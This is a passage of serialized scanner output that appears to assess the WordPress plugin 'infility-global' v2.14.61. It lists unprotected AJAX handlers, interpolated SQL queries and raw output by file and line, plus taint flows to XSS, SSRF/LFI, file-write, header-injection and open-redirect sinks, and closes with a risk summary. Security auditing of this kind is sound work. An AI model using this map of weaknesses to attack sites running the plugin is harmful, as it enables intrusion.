ord_pages_ajax",{"action":482,"nopriv":391,"callback":482,"hasNonce":46,"hasCapCheck":46,"file":345,"line":436},[],[486,490,493],{"tag":487,"callback":488,"file":237,"line":489},"infility_power_by","infility_power_by_html",175,{"tag":491,"callback":492,"file":320,"line":24},"infility_form","shortcode_infility_form",{"tag":494,"callback":495,"file":345,"line":266},"infility_global_keywords","shortcode_infility_global_keywords",[],42,{"dangerousFunctions":499,"sqlUsage":505,"outputEscaping":546,"fileOperations":852,"externalRequests":326,"nonceChecks":309,"capabilityChecks":329,"bundledLibraries":853},[500],{"fn":501,"file":502,"line":503,"context":504},"unserialize","widgets\\infility-import-data\\include\\PhpSpreadsheet\\src\\PhpSpreadsheet\\Worksheet\\Worksheet.php",3469,"$this->{$key} = unserialize(serialize($val));",{"prepared":506,"raw":294,"locations":507},60,[508,511,513,514,515,517,519,522,523,525,527,529,530,532,535,538,540,541,543,544],{"file":509,"line":25,"context":510},"include\\class\\db.class.php","$wpdb->query() with variable interpolation",{"file":509,"line":156,"context":512},"$wpdb->get_results() with variable interpolation",{"file":509,"line":280,"context":512},{"file":509,"line":129,"context":512},{"file":509,"line":516,"context":512},41,{"file":509,"line":518,"context":510},91,{"file":273,"line":520,"context":521},115,"$wpdb->get_var() with variable interpolation",{"file":273,"line":489,"context":521},{"file":273,"line":524,"context":521},176,{"file":273,"line":526,"context":521},216,{"file":273,"line":528,"context":521},217,{"file":312,"line":223,"context":521},{"file":312,"line":531,"context":521},54,{"file":312,"line":533,"context":534},73,"$wpdb->get_row() with variable interpolation",{"file":536,"line":537,"context":510},"widgets\\infility-import-data\\include\\infility-import-site.php",735,{"file":324,"line":539,"context":521},43,{"file":324,"line":506,"context":521},{"file":324,"line":542,"context":521},83,{"file":332,"line":191,"context":521},{"file":332,"line":545,"context":534},231,{"escaped":547,"rawEcho":255,"locations":548},388,[549,553,555,557,559,561,562,563,564,565,567,569,571,573,575,577,579,580,582,584,586,588,590,592,595,596,598,600,602,604,605,607,608,610,611,613,615,617,619,621,623,625,627,628,629,631,633,634,636,638,640,642,644,646,648,649,651,653,654,656,659,661,662,663,665,667,670,672,673,674,676,677,678,679,680,681,684,686,688,690,693,695,696,698,700,701,703,704,705,706,707,709,710,712,714,716,718,719,720,723,725,727,728,730,732,733,734,736,738,739,741,743,745,747,749,750,753,756,758,760,762,764,765,767,769,771,772,774,776,777,779,780,782,784,786,788,790,792,793,795,797,799,801,803,805,807,809,811,813,815,817,819,821,822,824,826,827,829,831,833,836,838,840,841,843,844,846,847,848,849,850,851],{"file":550,"line":551,"context":552},"include\\class\\str.class.php",66,"raw output",{"file":218,"line":554,"context":552},408,{"file":218,"line":556,"context":552},428,{"file":218,"line":558,"context":552},439,{"file":560,"line":280,"context":552},"include\\infility_guide_page.php",{"file":560,"line":191,"context":552},{"file":560,"line":387,"context":552},{"file":560,"line":506,"context":552},{"file":560,"line":551,"context":552},{"file":560,"line":566,"context":552},84,{"file":560,"line":568,"context":552},102,{"file":560,"line":570,"context":552},110,{"file":560,"line":572,"context":552},141,{"file":560,"line":574,"context":552},142,{"file":560,"line":576,"context":552},161,{"file":560,"line":578,"context":552},162,{"file":560,"line":392,"context":552},{"file":560,"line":581,"context":552},180,{"file":560,"line":583,"context":552},197,{"file":560,"line":585,"context":552},198,{"file":560,"line":587,"context":552},223,{"file":560,"line":589,"context":552},224,{"file":560,"line":591,"context":552},225,{"file":593,"line":594,"context":552},"include\\infility_setting_page.php",2,{"file":593,"line":191,"context":552},{"file":597,"line":287,"context":552},"include\\wp_infility_table.php",{"file":597,"line":599,"context":552},55,{"file":597,"line":601,"context":552},59,{"file":597,"line":603,"context":552},63,{"file":597,"line":603,"context":552},{"file":597,"line":606,"context":552},65,{"file":597,"line":606,"context":552},{"file":597,"line":609,"context":552},71,{"file":597,"line":609,"context":552},{"file":237,"line":612,"context":552},184,{"file":237,"line":614,"context":552},453,{"file":237,"line":616,"context":552},464,{"file":237,"line":618,"context":552},492,{"file":237,"line":620,"context":552},516,{"file":622,"line":497,"context":552},"update_version.php",{"file":622,"line":624,"context":552},47,{"file":622,"line":626,"context":552},50,{"file":622,"line":606,"context":552},{"file":622,"line":551,"context":552},{"file":622,"line":630,"context":552},67,{"file":622,"line":632,"context":552},68,{"file":622,"line":609,"context":552},{"file":262,"line":635,"context":552},143,{"file":262,"line":637,"context":552},148,{"file":262,"line":639,"context":552},149,{"file":273,"line":641,"context":552},105,{"file":273,"line":643,"context":552},131,{"file":273,"line":645,"context":552},146,{"file":273,"line":647,"context":552},155,{"file":273,"line":392,"context":552},{"file":273,"line":650,"context":552},191,{"file":273,"line":652,"context":552},220,{"file":273,"line":589,"context":552},{"file":273,"line":655,"context":552},238,{"file":657,"line":658,"context":552},"widgets\\elementor-tab\\includes\\widgets\\elementor_breadcrumb.php",449,{"file":657,"line":660,"context":552},452,{"file":657,"line":660,"context":552},{"file":657,"line":614,"context":552},{"file":657,"line":664,"context":552},454,{"file":657,"line":666,"context":552},456,{"file":668,"line":669,"context":552},"widgets\\elementor-tab\\includes\\widgets\\elementor_img_silde.php",907,{"file":668,"line":671,"context":552},908,{"file":668,"line":671,"context":552},{"file":668,"line":671,"context":552},{"file":668,"line":675,"context":552},927,{"file":668,"line":675,"context":552},{"file":668,"line":675,"context":552},{"file":668,"line":675,"context":552},{"file":668,"line":675,"context":552},{"file":668,"line":675,"context":552},{"file":682,"line":683,"context":552},"widgets\\elementor-tab\\includes\\widgets\\elementor_nav_posts.php",1075,{"file":682,"line":685,"context":552},1076,{"file":682,"line":687,"context":552},1100,{"file":682,"line":689,"context":552},1125,{"file":691,"line":692,"context":552},"widgets\\elementor-tab\\includes\\widgets\\elementor_tab_html.php",1520,{"file":312,"line":694,"context":552},79,{"file":312,"line":520,"context":552},{"file":312,"line":697,"context":552},117,{"file":312,"line":699,"context":552},138,{"file":312,"line":699,"context":552},{"file":312,"line":702,"context":552},140,{"file":312,"line":574,"context":552},{"file":312,"line":574,"context":552},{"file":312,"line":252,"context":552},{"file":312,"line":255,"context":552},{"file":312,"line":708,"context":552},189,{"file":312,"line":708,"context":552},{"file":312,"line":711,"context":552},196,{"file":312,"line":713,"context":552},280,{"file":312,"line":715,"context":552},498,{"file":717,"line":412,"context":552},"widgets\\infility-form\\elementor-infility-form-widget.php",{"file":320,"line":280,"context":552},{"file":320,"line":606,"context":552},{"file":721,"line":722,"context":552},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\infra\\LocaleGenerator.php",380,{"file":724,"line":416,"context":552},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Engineering\\Convert-Online.php",{"file":724,"line":726,"context":552},53,{"file":724,"line":603,"context":552},{"file":724,"line":729,"context":552},85,{"file":731,"line":458,"context":552},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Header.php",{"file":731,"line":726,"context":552},{"file":731,"line":632,"context":552},{"file":731,"line":735,"context":552},93,{"file":737,"line":23,"context":552},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\index.php",{"file":737,"line":416,"context":552},{"file":740,"line":233,"context":552},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Pdf\\21e_UnusualFont_mpdf.php",{"file":742,"line":191,"context":552},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Reader2\\23_iterateRowsYield.php",{"file":744,"line":539,"context":552},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Wizards\\NumberFormat\\Accounting.php",{"file":746,"line":539,"context":552},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Wizards\\NumberFormat\\Currency.php",{"file":748,"line":566,"context":552},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\src\\PhpSpreadsheet\\Calculation\\Engine\\Logger.php",{"file":748,"line":566,"context":552},{"file":751,"line":752,"context":552},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\src\\PhpSpreadsheet\\Chart\\Renderer\\JpGraphRendererBase.php",876,{"file":754,"line":755,"context":552},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\src\\PhpSpreadsheet\\Helper\\Sample.php",132,{"file":754,"line":757,"context":552},187,{"file":754,"line":759,"context":552},219,{"file":754,"line":761,"context":552},243,{"file":324,"line":763,"context":552},372,{"file":324,"line":763,"context":552},{"file":324,"line":766,"context":552},391,{"file":324,"line":768,"context":552},403,{"file":324,"line":770,"context":552},420,{"file":324,"line":770,"context":552},{"file":324,"line":773,"context":552},442,{"file":324,"line":775,"context":552},504,{"file":324,"line":775,"context":552},{"file":324,"line":778,"context":552},521,{"file":324,"line":778,"context":552},{"file":324,"line":781,"context":552},534,{"file":324,"line":783,"context":552},554,{"file":332,"line":785,"context":552},237,{"file":332,"line":787,"context":552},263,{"file":332,"line":789,"context":552},265,{"file":332,"line":791,"context":552},269,{"file":332,"line":791,"context":552},{"file":332,"line":794,"context":552},285,{"file":332,"line":796,"context":552},292,{"file":332,"line":798,"context":552},295,{"file":332,"line":800,"context":552},296,{"file":332,"line":802,"context":552},298,{"file":332,"line":804,"context":552},301,{"file":332,"line":806,"context":552},320,{"file":332,"line":808,"context":552},321,{"file":332,"line":810,"context":552},358,{"file":332,"line":812,"context":552},370,{"file":332,"line":814,"context":552},376,{"file":332,"line":816,"context":552},383,{"file":332,"line":818,"context":552},384,{"file":332,"line":820,"context":552},399,{"file":332,"line":768,"context":552},{"file":332,"line":823,"context":552},404,{"file":337,"line":825,"context":552},56,{"file":337,"line":585,"context":552},{"file":337,"line":828,"context":552},334,{"file":345,"line":830,"context":552},409,{"file":345,"line":832,"context":552},443,{"file":834,"line":835,"context":552},"widgets\\keyword-pages\\templates\\keyword-page.php",94,{"file":834,"line":837,"context":552},178,{"file":834,"line":839,"context":552},213,{"file":368,"line":603,"context":552},{"file":842,"line":542,"context":552},"widgets\\translatepress-tools\\projects_page.php",{"file":842,"line":566,"context":552},{"file":845,"line":191,"context":552},"widgets\\translatepress-tools\\setting_page.php",{"file":845,"line":207,"context":552},{"file":845,"line":405,"context":552},{"file":845,"line":416,"context":552},{"file":845,"line":516,"context":552},{"file":845,"line":202,"context":552},{"file":845,"line":626,"context":552},174,[],[855,877,895,915,940,953,961,974,984,996,1007,1018,1028,1038,1046,1066,1081,1090,1102,1114,1122,1133,1141,1150,1158,1169,1177,1185,1203,1217,1226,1240,1248],{"entryPoint":856,"graph":857,"unsanitizedCount":594,"severity":37},"save_js_error (include\\InfilityGlobalErrorRecord.php:263)",{"nodes":858,"edges":874},[859,863,868,870],{"id":860,"type":861,"label":862,"file":218,"line":789},"n0","source","$_SERVER",{"id":864,"type":865,"label":866,"file":218,"line":791,"wp_function":867},"n1","sink","header() [Header Injection]","header",{"id":869,"type":861,"label":862,"file":218,"line":789},"n2",{"id":871,"type":865,"label":872,"file":218,"line":794,"wp_function":873},"n3","file_put_contents() [File Write]","file_put_contents",[875,876],{"from":860,"to":864,"sanitized":46},{"from":869,"to":871,"sanitized":46},{"entryPoint":878,"graph":879,"unsanitizedCount":47,"severity":37},"save_cf7_record (include\\InfilityGlobalErrorRecord.php:300)",{"nodes":880,"edges":891},[881,882,884,885,886,889],{"id":860,"type":861,"label":862,"file":218,"line":804},{"id":864,"type":865,"label":866,"file":218,"line":883,"wp_function":867},304,{"id":869,"type":861,"label":862,"file":218,"line":804},{"id":871,"type":865,"label":872,"file":218,"line":806,"wp_function":873},{"id":887,"type":861,"label":888,"file":218,"line":806},"n4","$_POST",{"id":890,"type":865,"label":872,"file":218,"line":806,"wp_function":873},"n5",[892,893,894],{"from":860,"to":864,"sanitized":46},{"from":869,"to":871,"sanitized":46},{"from":887,"to":890,"sanitized":46},{"entryPoint":896,"graph":897,"unsanitizedCount":914,"severity":37},"show_cf7_records (include\\InfilityGlobalErrorRecord.php:325)",{"nodes":898,"edges":911},[899,902,906,907],{"id":860,"type":861,"label":900,"file":218,"line":901},"$_GET (x2)",328,{"id":864,"type":865,"label":903,"file":218,"line":904,"wp_function":905},"file_get_contents() [SSRF\u002FLFI]",373,"file_get_contents",{"id":869,"type":861,"label":900,"file":218,"line":901},{"id":871,"type":865,"label":908,"file":218,"line":909,"wp_function":910},"echo() [XSS]",374,"echo",[912,913],{"from":860,"to":864,"sanitized":46},{"from":869,"to":871,"sanitized":46},4,{"entryPoint":916,"graph":917,"unsanitizedCount":329,"severity":37},"\u003CInfilityGlobalErrorRecord> (include\\InfilityGlobalErrorRecord.php:0)",{"nodes":918,"edges":934},[919,921,922,923,924,925,926,928,930,932],{"id":860,"type":861,"label":920,"file":218,"line":789},"$_SERVER (x2)",{"id":864,"type":865,"label":866,"file":218,"line":791,"wp_function":867},{"id":869,"type":861,"label":920,"file":218,"line":789},{"id":871,"type":865,"label":872,"file":218,"line":794,"wp_function":873},{"id":887,"type":861,"label":888,"file":218,"line":806},{"id":890,"type":865,"label":872,"file":218,"line":806,"wp_function":873},{"id":927,"type":861,"label":900,"file":218,"line":901},"n6",{"id":929,"type":865,"label":903,"file":218,"line":904,"wp_function":905},"n7",{"id":931,"type":861,"label":900,"file":218,"line":901},"n8",{"id":933,"type":865,"label":908,"file":218,"line":909,"wp_function":910},"n9",[935,936,937,938,939],{"from":860,"to":864,"sanitized":46},{"from":869,"to":871,"sanitized":46},{"from":887,"to":890,"sanitized":46},{"from":927,"to":929,"sanitized":46},{"from":931,"to":933,"sanitized":46},{"entryPoint":941,"graph":942,"unsanitizedCount":47,"severity":37},"add_search_from (include\\wp_infility_table.php:51)",{"nodes":943,"edges":950},[944,946,947,949],{"id":860,"type":861,"label":945,"file":597,"line":599},"$_REQUEST['page']",{"id":864,"type":865,"label":908,"file":597,"line":599,"wp_function":910},{"id":869,"type":861,"label":948,"file":597,"line":603},"$_GET[?] (x2)",{"id":871,"type":865,"label":908,"file":597,"line":603,"wp_function":910},[951,952],{"from":860,"to":864,"sanitized":46},{"from":869,"to":871,"sanitized":46},{"entryPoint":954,"graph":955,"unsanitizedCount":594,"severity":37},"IGP_nav_page (infility_global.php:447)",{"nodes":956,"edges":959},[957,958],{"id":860,"type":861,"label":900,"file":237,"line":658},{"id":864,"type":865,"label":908,"file":237,"line":614,"wp_function":910},[960],{"from":860,"to":864,"sanitized":46},{"entryPoint":962,"graph":963,"unsanitizedCount":206,"severity":37},"\u003CAccounting> (widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Wizards\\NumberFormat\\Accounting.php:0)",{"nodes":964,"edges":971},[965,967,970],{"id":860,"type":861,"label":888,"file":744,"line":966},106,{"id":864,"type":968,"label":969,"file":744,"line":966},"transform","→ log()",{"id":869,"type":865,"label":908,"file":754,"line":757,"wp_function":910},[972,973],{"from":860,"to":864,"sanitized":46},{"from":864,"to":869,"sanitized":46},{"entryPoint":975,"graph":976,"unsanitizedCount":206,"severity":37},"\u003CCurrency> (widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Wizards\\NumberFormat\\Currency.php:0)",{"nodes":977,"edges":981},[978,979,980],{"id":860,"type":861,"label":888,"file":746,"line":966},{"id":864,"type":968,"label":969,"file":746,"line":966},{"id":869,"type":865,"label":908,"file":754,"line":757,"wp_function":910},[982,983],{"from":860,"to":864,"sanitized":46},{"from":864,"to":869,"sanitized":46},{"entryPoint":985,"graph":986,"unsanitizedCount":206,"severity":37},"\u003CNumber> (widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Wizards\\NumberFormat\\Number.php:0)",{"nodes":987,"edges":993},[988,991,992],{"id":860,"type":861,"label":888,"file":989,"line":990},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Wizards\\NumberFormat\\Number.php",70,{"id":864,"type":968,"label":969,"file":989,"line":990},{"id":869,"type":865,"label":908,"file":754,"line":757,"wp_function":910},[994,995],{"from":860,"to":864,"sanitized":46},{"from":864,"to":869,"sanitized":46},{"entryPoint":997,"graph":998,"unsanitizedCount":206,"severity":37},"\u003CPercentage> (widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Wizards\\NumberFormat\\Percentage.php:0)",{"nodes":999,"edges":1004},[1000,1002,1003],{"id":860,"type":861,"label":888,"file":1001,"line":506},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Wizards\\NumberFormat\\Percentage.php",{"id":864,"type":968,"label":969,"file":1001,"line":506},{"id":869,"type":865,"label":908,"file":754,"line":757,"wp_function":910},[1005,1006],{"from":860,"to":864,"sanitized":46},{"from":864,"to":869,"sanitized":46},{"entryPoint":1008,"graph":1009,"unsanitizedCount":206,"severity":37},"\u003CScientific> (widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Wizards\\NumberFormat\\Scientific.php:0)",{"nodes":1010,"edges":1015},[1011,1013,1014],{"id":860,"type":861,"label":888,"file":1012,"line":506},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Wizards\\NumberFormat\\Scientific.php",{"id":864,"type":968,"label":969,"file":1012,"line":506},{"id":869,"type":865,"label":908,"file":754,"line":757,"wp_function":910},[1016,1017],{"from":860,"to":864,"sanitized":46},{"from":864,"to":869,"sanitized":46},{"entryPoint":1019,"graph":1020,"unsanitizedCount":206,"severity":37},"import_site (widgets\\infility-import-data\\infility-import-data.php:621)",{"nodes":1021,"edges":1026},[1022,1024],{"id":860,"type":861,"label":888,"file":324,"line":1023},634,{"id":864,"type":865,"label":903,"file":324,"line":1025,"wp_function":905},639,[1027],{"from":860,"to":864,"sanitized":46},{"entryPoint":1029,"graph":1030,"unsanitizedCount":206,"severity":37},"header_lang_301 (widgets\\infility-translate-tool\\infility-translate-tool.php:32)",{"nodes":1031,"edges":1036},[1032,1033],{"id":860,"type":861,"label":862,"file":337,"line":412},{"id":864,"type":865,"label":1034,"file":337,"line":421,"wp_function":1035},"wp_redirect() [Open Redirect]","wp_redirect",[1037],{"from":860,"to":864,"sanitized":46},{"entryPoint":1039,"graph":1040,"unsanitizedCount":206,"severity":37},"show_head (widgets\\infility-translate-tool\\infility-translate-tool.php:44)",{"nodes":1041,"edges":1044},[1042,1043],{"id":860,"type":861,"label":862,"file":337,"line":726},{"id":864,"type":865,"label":908,"file":337,"line":825,"wp_function":910},[1045],{"from":860,"to":864,"sanitized":46},{"entryPoint":1047,"graph":1048,"unsanitizedCount":47,"severity":37},"openai_text (widgets\\keyword-pages\\includes\\ajax.php:9)",{"nodes":1049,"edges":1061},[1050,1052,1054,1056,1058,1060],{"id":860,"type":861,"label":888,"file":1051,"line":191},"widgets\\keyword-pages\\includes\\ajax.php",{"id":864,"type":968,"label":1053,"file":1051,"line":191},"→ get_cache()",{"id":869,"type":865,"label":903,"file":1051,"line":1055,"wp_function":905},58,{"id":871,"type":861,"label":1057,"file":1051,"line":423},"$_POST (x2)",{"id":887,"type":968,"label":1059,"file":1051,"line":423},"→ set_cache()",{"id":890,"type":865,"label":872,"file":1051,"line":990,"wp_function":873},[1062,1063,1064,1065],{"from":860,"to":864,"sanitized":46},{"from":864,"to":869,"sanitized":46},{"from":871,"to":887,"sanitized":46},{"from":887,"to":890,"sanitized":46},{"entryPoint":1067,"graph":1068,"unsanitizedCount":47,"severity":37},"\u003Cajax> (widgets\\keyword-pages\\includes\\ajax.php:0)",{"nodes":1069,"edges":1076},[1070,1071,1072,1073,1074,1075],{"id":860,"type":861,"label":888,"file":1051,"line":191},{"id":864,"type":968,"label":1053,"file":1051,"line":191},{"id":869,"type":865,"label":903,"file":1051,"line":1055,"wp_function":905},{"id":871,"type":861,"label":1057,"file":1051,"line":423},{"id":887,"type":968,"label":1059,"file":1051,"line":423},{"id":890,"type":865,"label":872,"file":1051,"line":990,"wp_function":873},[1077,1078,1079,1080],{"from":860,"to":864,"sanitized":46},{"from":864,"to":869,"sanitized":46},{"from":871,"to":887,"sanitized":46},{"from":887,"to":890,"sanitized":46},{"entryPoint":1082,"graph":1083,"unsanitizedCount":206,"severity":37},"use_custom_template (widgets\\keyword-pages\\keyword-pages.php:333)",{"nodes":1084,"edges":1088},[1085,1087],{"id":860,"type":861,"label":1086,"file":345,"line":830},"$_SERVER['REQUEST_URI']",{"id":864,"type":865,"label":908,"file":345,"line":830,"wp_function":910},[1089],{"from":860,"to":864,"sanitized":46},{"entryPoint":1091,"graph":1092,"unsanitizedCount":206,"severity":37},"save_project (widgets\\translatepress-tools\\translatepress-tools.php:150)",{"nodes":1093,"edges":1100},[1094,1096],{"id":860,"type":861,"label":888,"file":1095,"line":647},"widgets\\translatepress-tools\\translatepress-tools.php",{"id":864,"type":865,"label":1097,"file":1095,"line":1098,"wp_function":1099},"wp_remote_post() [SSRF]",173,"wp_remote_post",[1101],{"from":860,"to":864,"sanitized":46},{"entryPoint":1103,"graph":1104,"unsanitizedCount":47,"severity":1113},"\u003Cwp_infility_table> (include\\wp_infility_table.php:0)",{"nodes":1105,"edges":1110},[1106,1107,1108,1109],{"id":860,"type":861,"label":945,"file":597,"line":599},{"id":864,"type":865,"label":908,"file":597,"line":599,"wp_function":910},{"id":869,"type":861,"label":948,"file":597,"line":603},{"id":871,"type":865,"label":908,"file":597,"line":603,"wp_function":910},[1111,1112],{"from":860,"to":864,"sanitized":46},{"from":869,"to":871,"sanitized":46},"low",{"entryPoint":1115,"graph":1116,"unsanitizedCount":13,"severity":1113},"\u003Cinfility_global> (infility_global.php:0)",{"nodes":1117,"edges":1120},[1118,1119],{"id":860,"type":861,"label":900,"file":237,"line":658},{"id":864,"type":865,"label":908,"file":237,"line":614,"wp_function":910},[1121],{"from":860,"to":864,"sanitized":391},{"entryPoint":1123,"graph":1124,"unsanitizedCount":13,"severity":1113},"CFP_setting_page (widgets\\contact-form-plugins\\contact-form-plugins.php:93)",{"nodes":1125,"edges":1131},[1126,1129],{"id":860,"type":861,"label":1127,"file":273,"line":1128},"$_GET",139,{"id":864,"type":865,"label":908,"file":273,"line":1130,"wp_function":910},192,[1132],{"from":860,"to":864,"sanitized":391},{"entryPoint":1134,"graph":1135,"unsanitizedCount":13,"severity":1113},"\u003Ccontact-form-plugins> (widgets\\contact-form-plugins\\contact-form-plugins.php:0)",{"nodes":1136,"edges":1139},[1137,1138],{"id":860,"type":861,"label":900,"file":273,"line":1128},{"id":864,"type":865,"label":908,"file":273,"line":1130,"wp_function":910},[1140],{"from":860,"to":864,"sanitized":391},{"entryPoint":1142,"graph":1143,"unsanitizedCount":13,"severity":1113},"chat_tool_setting_page (widgets\\infility-chat-tool\\infility-chat-tool.php:60)",{"nodes":1144,"edges":1148},[1145,1146],{"id":860,"type":861,"label":1127,"file":312,"line":990},{"id":864,"type":865,"label":908,"file":312,"line":1147,"wp_function":910},281,[1149],{"from":860,"to":864,"sanitized":391},{"entryPoint":1151,"graph":1152,"unsanitizedCount":13,"severity":1113},"\u003Cinfility-chat-tool> (widgets\\infility-chat-tool\\infility-chat-tool.php:0)",{"nodes":1153,"edges":1156},[1154,1155],{"id":860,"type":861,"label":1127,"file":312,"line":990},{"id":864,"type":865,"label":908,"file":312,"line":1147,"wp_function":910},[1157],{"from":860,"to":864,"sanitized":391},{"entryPoint":1159,"graph":1160,"unsanitizedCount":206,"severity":1113},"set_options (widgets\\infility-form\\infility-form.php:165)",{"nodes":1161,"edges":1167},[1162,1164],{"id":860,"type":861,"label":888,"file":320,"line":1163},170,{"id":864,"type":865,"label":1165,"file":320,"line":852,"wp_function":1166},"update_option() [Settings Manipulation]","update_option",[1168],{"from":860,"to":864,"sanitized":46},{"entryPoint":1170,"graph":1171,"unsanitizedCount":206,"severity":1113},"\u003Cinfility-form> (widgets\\infility-form\\infility-form.php:0)",{"nodes":1172,"edges":1175},[1173,1174],{"id":860,"type":861,"label":888,"file":320,"line":1163},{"id":864,"type":865,"label":1165,"file":320,"line":852,"wp_function":1166},[1176],{"from":860,"to":864,"sanitized":46},{"entryPoint":1178,"graph":1179,"unsanitizedCount":13,"severity":1113},"\u003Cinfility-import-data> (widgets\\infility-import-data\\infility-import-data.php:0)",{"nodes":1180,"edges":1183},[1181,1182],{"id":860,"type":861,"label":888,"file":324,"line":1023},{"id":864,"type":865,"label":903,"file":324,"line":1025,"wp_function":905},[1184],{"from":860,"to":864,"sanitized":391},{"entryPoint":1186,"graph":1187,"unsanitizedCount":13,"severity":1113},"redirect_setting_page (widgets\\infility-redirect\\infility-redirect.php:219)",{"nodes":1188,"edges":1199},[1189,1192,1193,1195,1196,1198],{"id":860,"type":861,"label":1190,"file":332,"line":1191},"$_GET (x7)",245,{"id":864,"type":865,"label":908,"file":332,"line":796,"wp_function":910},{"id":869,"type":861,"label":1194,"file":332,"line":798},"$_GET['page']",{"id":871,"type":865,"label":908,"file":332,"line":798,"wp_function":910},{"id":887,"type":861,"label":1197,"file":332,"line":800},"$_GET['set_type']",{"id":890,"type":865,"label":908,"file":332,"line":800,"wp_function":910},[1200,1201,1202],{"from":860,"to":864,"sanitized":391},{"from":869,"to":871,"sanitized":391},{"from":887,"to":890,"sanitized":391},{"entryPoint":1204,"graph":1205,"unsanitizedCount":13,"severity":1113},"\u003Cinfility-redirect> (widgets\\infility-redirect\\infility-redirect.php:0)",{"nodes":1206,"edges":1213},[1207,1208,1209,1210,1211,1212],{"id":860,"type":861,"label":1190,"file":332,"line":1191},{"id":864,"type":865,"label":908,"file":332,"line":796,"wp_function":910},{"id":869,"type":861,"label":1194,"file":332,"line":798},{"id":871,"type":865,"label":908,"file":332,"line":798,"wp_function":910},{"id":887,"type":861,"label":1197,"file":332,"line":800},{"id":890,"type":865,"label":908,"file":332,"line":800,"wp_function":910},[1214,1215,1216],{"from":860,"to":864,"sanitized":391},{"from":869,"to":871,"sanitized":391},{"from":887,"to":890,"sanitized":391},{"entryPoint":1218,"graph":1219,"unsanitizedCount":206,"severity":1113},"translate_position (widgets\\infility-translate-tool\\infility-translate-tool.php:149)",{"nodes":1220,"edges":1224},[1221,1223],{"id":860,"type":861,"label":888,"file":337,"line":1222},154,{"id":864,"type":865,"label":1165,"file":337,"line":647,"wp_function":1166},[1225],{"from":860,"to":864,"sanitized":46},{"entryPoint":1227,"graph":1228,"unsanitizedCount":13,"severity":1113},"\u003Cinfility-translate-tool> (widgets\\infility-translate-tool\\infility-translate-tool.php:0)",{"nodes":1229,"edges":1236},[1230,1231,1232,1233,1234,1235],{"id":860,"type":861,"label":862,"file":337,"line":412},{"id":864,"type":865,"label":1034,"file":337,"line":421,"wp_function":1035},{"id":869,"type":861,"label":862,"file":337,"line":726},{"id":871,"type":865,"label":908,"file":337,"line":825,"wp_function":910},{"id":887,"type":861,"label":888,"file":337,"line":1222},{"id":890,"type":865,"label":1165,"file":337,"line":647,"wp_function":1166},[1237,1238,1239],{"from":860,"to":864,"sanitized":391},{"from":869,"to":871,"sanitized":391},{"from":887,"to":890,"sanitized":391},{"entryPoint":1241,"graph":1242,"unsanitizedCount":206,"severity":1113},"\u003Ckeyword-pages> (widgets\\keyword-pages\\keyword-pages.php:0)",{"nodes":1243,"edges":1246},[1244,1245],{"id":860,"type":861,"label":1086,"file":345,"line":830},{"id":864,"type":865,"label":908,"file":345,"line":830,"wp_function":910},[1247],{"from":860,"to":864,"sanitized":46},{"entryPoint":1249,"graph":1250,"unsanitizedCount":13,"severity":1113},"\u003Ctranslatepress-tools> (widgets\\translatepress-tools\\translatepress-tools.php:0)",{"nodes":1251,"edges":1254},[1252,1253],{"id":860,"type":861,"label":888,"file":1095,"line":647},{"id":864,"type":865,"label":1097,"file":1095,"line":1098,"wp_function":1099},[1255],{"from":860,"to":864,"sanitized":391},{"summary":1257,"deductions":1258},"The \"infility-global\" plugin v2.14.61 exhibits a concerning security posture, largely due to its significant number of unprotected entry points and a history of numerous vulnerabilities.  While the plugin utilizes prepared statements for a majority of its SQL queries and has a reasonable rate of output escaping, these positive aspects are overshadowed by critical weaknesses.  The static analysis reveals a large attack surface with 35 out of 42 entry points lacking authentication checks, a major red flag for potential unauthorized access and actions. The presence of the `unserialize` function, even if only one, is a known risk for deserialization vulnerabilities if not handled with extreme care and input validation.\n\nThe vulnerability history is particularly alarming.  With 10 known CVEs, 6 of which are currently unpatched, and a significant portion being high severity, this plugin has a demonstrated track record of being insecure. The common vulnerability types like SQL Injection, Path Traversal, XSS, and Missing Authorization directly correlate with the identified weaknesses in the static analysis, such as unprotected AJAX handlers and the potential for unsanitized input. The last vulnerability being in February 2026, while in the future, is likely a data artifact and indicates a recent history of exploitation.\n\nIn conclusion, despite some good practices in SQL and output handling, the \"infility-global\" plugin has a high-risk profile. The extensive unprotected attack surface, coupled with a persistent history of serious, unpatched vulnerabilities, makes it a significant liability for any WordPress site.  Users should strongly consider disabling or replacing this plugin until these critical issues are addressed.",[1259,1261,1263,1265,1267,1269,1271],{"reason":1260,"points":270},"Unprotected AJAX handlers",{"reason":1262,"points":294},"Unpatched CVEs (6 total)",{"reason":1264,"points":294},"High severity unpatched CVEs (4 total)",{"reason":1266,"points":270},"Dangerous function: unserialize",{"reason":1268,"points":436},"Taint analysis: Flows with unsanitized paths",{"reason":1270,"points":270},"Missing nonce checks",{"reason":1272,"points":270},"Missing capability 